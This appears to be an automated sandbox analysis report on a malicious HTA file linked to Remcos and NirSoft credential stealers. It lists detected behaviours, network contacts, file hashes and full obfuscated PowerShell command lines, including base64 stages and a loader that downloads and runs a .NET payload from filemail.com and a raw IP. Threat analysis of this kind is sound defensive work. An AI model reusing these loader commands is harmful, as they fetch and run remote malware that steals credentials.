Analysis Overview
SHA256
712a8d8a82351dc2d2173b6d66245b1e2ee34db4045fa27b3e76dc462f8a5811
Threat Level: Known bad
The file seethebstpricewithbestthinghappingwithgoodnews.hta was found to be: Known bad.
Malicious Activity Summary
Remcos
Remcos family
NirSoft WebBrowserPassView
Detected Nirsoft tools
NirSoft MailPassView
Command and Scripting Interpreter: PowerShell
Evasion via Device Credential Deployment
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-11 09:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 09:40
Reported
2024-11-11 09:43
Platform
win7-20241010-en
Max time kernel
16s
Max time network
19s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebstpricewithbestthinghappingwithgoodnews.hta"
C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE
"C:\Windows\sYSTem32\WinDOwspowERSheLl\V1.0\POWErshell.ExE" "PoWersHELL.Exe -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt ; IeX($(iEx('[SySTEM.tExT.EncODIng]'+[cHaR]0X3a+[CHAR]58+'uTF8.geTSTrING([sySTEm.coNVert]'+[chAR]58+[cHAr]0x3A+'frOmBASE64sTRInG('+[CHaR]0x22+'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'+[cHar]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pcntzdb_.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES272.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC271.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElliD[1]+$SHellid[13]+'X') ((('uSzimageUrl ='+' '+'6FUhttps://1017.filemail.com/api/file/get?'+'f'+'ilekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f61'+'4bb209c62c1'+'7309'+'45176a0904f 6FU;uSzwe'+'bClient = New-Object Syste'+'m.Net.WebClient'+';uSzimageBy'+'tes = uSzwebClient.DownloadData(uSzimageUrl);uSzimageText = [Sy'+'stem'+'.Text.'+'Encoding]::UTF8.GetString(uSzima'+'geBytes);uSzstartFlag = 6FU<<BASE64_START>>6FU;uSze'+'nd'+'Fl'+'ag = 6FU<<BASE64_END>>6FU;uSzstartIndex = uSzimageText.IndexOf(uSzstartFlag);uSzendIndex = uSzimageText.IndexOf(uSzendFlag);uSz'+'startIndex -ge 0 -and uSz'+'endIndex -gt uSzstart'+'In'+'dex;uSzstartIndex += uSzstartFlag.Length;uSzbase64Length = uSz'+'endIndex - uSzstartIndex;uSzbase64Command = uSzima'+'geText.Substring(uSzstartIndex, uSzbase64Length);uSzbase64Rever'+'sed = -join (uSzbase64Command.ToCharArray() aQp ForEach-Object { uSz_ }'+')[-1..-(uSzbase64Comman'+'d.Length)];uSzcommandByte'+'s = [System.Convert]::FromBase64String(uSzbase64Reversed);'+'uSzloaded'+'Assembly = [System.Reflection.Assembly]::Load(uSzc'+'ommandBytes);uSzvaiMet'+'hod = [d'+'nlib.IO.Home].GetMethod(6'+'FUVAI6FU);uSzvaiMethod.Invoke(uSznull, @(6'+'FUtxt.SDOGTHW/053/831.171.49.32//:ptth6F'+'U, 6FU'+'desativado6FU, 6FUdesativado6FU, 6FUd'+'esativado6FU, 6FUCasPol6FU, 6F'+'Udesativado6FU, 6FU'+'desativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FU16FU,6FUdesativado6FU));') -replace ([cHar]54+[cHar]70+[cHar]85),[cHar]39-replace ([cHar]117+[cHar]83+[cHar]122),[cHar]36 -CREpLAce 'aQp',[cHar]124) )"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | efb2ffc06b69c9bf228ac00e4a9b3be4 |
| SHA1 | a8181396d86baca87fb7e88621028011e797f33c |
| SHA256 | f5628a33643263153d90f2a33c37d296eefb9583e704dd7afee225009477bbb6 |
| SHA512 | 59b0df51496b0ca939244df11e76fdbc289283ab3247be388dad786fc187223ad02afb464b2e104aa00d4443131fbcfa36b002c47a0bb4f39b3c4d4062f1880b |
\??\c:\Users\Admin\AppData\Local\Temp\pcntzdb_.cmdline
| MD5 | aed4a0569645cd3a6f9c98c0667691be |
| SHA1 | 2c369fac943486b07749aee533b1e106fc9ee2d0 |
| SHA256 | 3fa75e24d5a855f128f4e07cf3bfa6fd9275d93a4c857fd9b0105ccd61fb52b0 |
| SHA512 | 1557f32324ccde5bcd106798ed190df4f11a2227e1c25387c5f24786caa5cf141072a86b470396e2ed6aa055979ed574fb9eeaca7b6c4f8551da9d5e05583351 |
\??\c:\Users\Admin\AppData\Local\Temp\pcntzdb_.0.cs
| MD5 | 3acd336f0bedb873ee783ee181c191ff |
| SHA1 | ef57a3ee45eba0918f34b5eb8640cad14c65ca9e |
| SHA256 | ed4508bd17e5ecb9f847135624310d5a51c108bbb2ae43bf65f7678b561e71fa |
| SHA512 | 51e10cf11020d2a298a2f05ac59d5b41877d2b096adef0b1aa29e57cecc1dde7f9276e1ff3b6916ee23701495fc983cd54f24b5c9ece1e43e46daa31eb906117 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC271.tmp
| MD5 | f0a5c934ab745de7cfa52034d9b1caee |
| SHA1 | 603db8a3e5cac1340799f510ddcc5e263483fe95 |
| SHA256 | 90f88d4a8deaf74c435acfce405911465ad9e8131f49ba40dc300ca0375e4af1 |
| SHA512 | caf8bc9e1e2bb95c7ef0675d253dfdab1d9e89c744aba364877f6c1f43c6f14146fdd9523893ec5b7dd2708c431644006a6fad88e47f24d721ecf1db67adcd1d |
C:\Users\Admin\AppData\Local\Temp\RES272.tmp
| MD5 | 0315a2b13e1b3b797545dca898cfd13e |
| SHA1 | 8881f6496ce67bb21f221de5082d175e9f7c3fa0 |
| SHA256 | 4513e1752a196dc4318fb6512fef03f26a961f740d3d4c1f4054048196d35f4c |
| SHA512 | 2b8295190dca04127c3b52f16c52e76c4faac0d48f452182bf84b951cec91d5f929fb903935d87286994d686d0c77185712a7e21cc58cca41b456a400e90525d |
C:\Users\Admin\AppData\Local\Temp\pcntzdb_.dll
| MD5 | f4d60406b00a6ba1d79256a4d50fec15 |
| SHA1 | 4736d83745df16c15f98a230181b8eda85eba42e |
| SHA256 | b3b46abd4927d199f92c82227bb6ef82c616fde2360b340f1025acd9f30758d7 |
| SHA512 | a6f4590a0e978f7360318a762d00928243325c292b41fad37626ac64dfb8a94677530378aef90f020d4b09ac766156e8f87828bc4a18ba2f7eabdcf8dbfe12d8 |
C:\Users\Admin\AppData\Local\Temp\pcntzdb_.pdb
| MD5 | 1e63a22073540550f79e71819937dd7c |
| SHA1 | 3b89159e089d2df7300b8fceec19079a52f5cdf2 |
| SHA256 | 5e0cdf3a0f9e71360eeccaf42f21ba9c7caf9d63ba7894b55a990f29f4735050 |
| SHA512 | 433c61960c6513bb1056e918cc5ca342a184e1903482e8564d9a559e9685249e2d89c0b0c80ff84a3ec5b1d57cb9950d85cc6daf9ffa4fa88093b95466b6d8a5 |
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs
| MD5 | 6234bbb162edd9092f298bc3fc3580f9 |
| SHA1 | ce76d6cde8d930269e7c91be5d96f8202b0a45d5 |
| SHA256 | efae71d7eb1ab6860ab593ed670d8274fca4f3aac8473fe1cb39c18d0edd2ec2 |
| SHA512 | f16c5f4d0f2a09cf8d62a5756cbf16faccfa690ba86442962982941b925e5deb572505e9ff0ad5aa5ea48babe05ea6a64f769f27582edc29613a6958b20cf83f |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 09:40
Reported
2024-11-11 09:43
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Remcos
Remcos family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2320 set thread context of 3696 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 3696 set thread context of 2572 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 3696 set thread context of 3864 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 3696 set thread context of 3736 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebstpricewithbestthinghappingwithgoodnews.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE
"C:\Windows\sYSTem32\WinDOwspowERSheLl\V1.0\POWErshell.ExE" "PoWersHELL.Exe -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt ; IeX($(iEx('[SySTEM.tExT.EncODIng]'+[cHaR]0X3a+[CHAR]58+'uTF8.geTSTrING([sySTEm.coNVert]'+[chAR]58+[cHAr]0x3A+'frOmBASE64sTRInG('+[CHaR]0x22+'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'+[cHar]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\awmmgca1\awmmgca1.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9470.tmp" "c:\Users\Admin\AppData\Local\Temp\awmmgca1\CSCA2E087D4A4634244BD604312E622BB51.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxsaURbMV0rJFNIZWxsaWRbMTNdKydYJykgKCgoJ3VTemltYWdlVXJsID0nKycgJysnNkZVaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/JysnZicrJ2lsZWtleT0yQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjEnKyc0YmIyMDljNjJjMScrJzczMDknKyc0NTE3NmEwOTA0ZiA2RlU7dVN6d2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZScrJ20uTmV0LldlYkNsaWVudCcrJzt1U3ppbWFnZUJ5JysndGVzID0gdVN6d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh1U3ppbWFnZVVybCk7dVN6aW1hZ2VUZXh0ID0gW1N5Jysnc3RlbScrJy5UZXh0LicrJ0VuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodVN6aW1hJysnZ2VCeXRlcyk7dVN6c3RhcnRGbGFnID0gNkZVPDxCQVNFNjRfU1RBUlQ+PjZGVTt1U3plJysnbmQnKydGbCcrJ2FnID0gNkZVPDxCQVNFNjRfRU5EPj42RlU7dVN6c3RhcnRJbmRleCA9IHVTemltYWdlVGV4dC5JbmRleE9mKHVTenN0YXJ0RmxhZyk7dVN6ZW5kSW5kZXggPSB1U3ppbWFnZVRleHQuSW5kZXhPZih1U3plbmRGbGFnKTt1U3onKydzdGFydEluZGV4IC1nZSAwIC1hbmQgdVN6JysnZW5kSW5kZXggLWd0IHVTenN0YXJ0JysnSW4nKydkZXg7dVN6c3RhcnRJbmRleCArPSB1U3pzdGFydEZsYWcuTGVuZ3RoO3VTemJhc2U2NExlbmd0aCA9IHVTeicrJ2VuZEluZGV4IC0gdVN6c3RhcnRJbmRleDt1U3piYXNlNjRDb21tYW5kID0gdVN6aW1hJysnZ2VUZXh0LlN1YnN0cmluZyh1U3pzdGFydEluZGV4LCB1U3piYXNlNjRMZW5ndGgpO3VTemJhc2U2NFJldmVyJysnc2VkID0gLWpvaW4gKHVTemJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBhUXAgRm9yRWFjaC1PYmplY3QgeyB1U3pfIH0nKycpWy0xLi4tKHVTemJhc2U2NENvbW1hbicrJ2QuTGVuZ3RoKV07dVN6Y29tbWFuZEJ5dGUnKydzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh1U3piYXNlNjRSZXZlcnNlZCk7JysndVN6bG9hZGVkJysnQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHVTemMnKydvbW1hbmRCeXRlcyk7dVN6dmFpTWV0JysnaG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGhvZCg2JysnRlVWQUk2RlUpO3VTenZhaU1ldGhvZC5JbnZva2UodVN6bnVsbCwgQCg2JysnRlV0eHQuU0RPR1RIVy8wNTMvODMxLjE3MS40OS4zMi8vOnB0dGg2RicrJ1UsIDZGVScrJ2Rlc2F0aXZhZG82RlUsIDZGVWRlc2F0aXZhZG82RlUsIDZGVWQnKydlc2F0aXZhZG82RlUsIDZGVUNhc1BvbDZGVSwgNkYnKydVZGVzYXRpdmFkbzZGVSwgNkZVJysnZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRv
NkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVMTZGVSw2RlVkZXNhdGl2YWRvNkZVKSk7JykgIC1yZXBsYWNlIChbY0hhcl01NCtbY0hhcl03MCtbY0hhcl04NSksW2NIYXJdMzktcmVwbGFjZSAgKFtjSGFyXTExNytbY0hhcl04MytbY0hhcl0xMjIpLFtjSGFyXTM2IC1DUkVwTEFjZSAgJ2FRcCcsW2NIYXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElliD[1]+$SHellid[13]+'X') ((('uSzimageUrl ='+' '+'6FUhttps://1017.filemail.com/api/file/get?'+'f'+'ilekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f61'+'4bb209c62c1'+'7309'+'45176a0904f 6FU;uSzwe'+'bClient = New-Object Syste'+'m.Net.WebClient'+';uSzimageBy'+'tes = uSzwebClient.DownloadData(uSzimageUrl);uSzimageText = [Sy'+'stem'+'.Text.'+'Encoding]::UTF8.GetString(uSzima'+'geBytes);uSzstartFlag = 6FU<<BASE64_START>>6FU;uSze'+'nd'+'Fl'+'ag = 6FU<<BASE64_END>>6FU;uSzstartIndex = uSzimageText.IndexOf(uSzstartFlag);uSzendIndex = uSzimageText.IndexOf(uSzendFlag);uSz'+'startIndex -ge 0 -and uSz'+'endIndex -gt uSzstart'+'In'+'dex;uSzstartIndex += uSzstartFlag.Length;uSzbase64Length = uSz'+'endIndex - uSzstartIndex;uSzbase64Command = uSzima'+'geText.Substring(uSzstartIndex, uSzbase64Length);uSzbase64Rever'+'sed = -join (uSzbase64Command.ToCharArray() aQp ForEach-Object { uSz_ }'+')[-1..-(uSzbase64Comman'+'d.Length)];uSzcommandByte'+'s = [System.Convert]::FromBase64String(uSzbase64Reversed);'+'uSzloaded'+'Assembly = [System.Reflection.Assembly]::Load(uSzc'+'ommandBytes);uSzvaiMet'+'hod = [d'+'nlib.IO.Home].GetMethod(6'+'FUVAI6FU);uSzvaiMethod.Invoke(uSznull, @(6'+'FUtxt.SDOGTHW/053/831.171.49.32//:ptth6F'+'U, 6FU'+'desativado6FU, 6FUdesativado6FU, 6FUd'+'esativado6FU, 6FUCasPol6FU, 6F'+'Udesativado6FU, 6FU'+'desativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FU16FU,6FUdesativado6FU));') -replace ([cHar]54+[cHar]70+[cHar]85),[cHar]39-replace 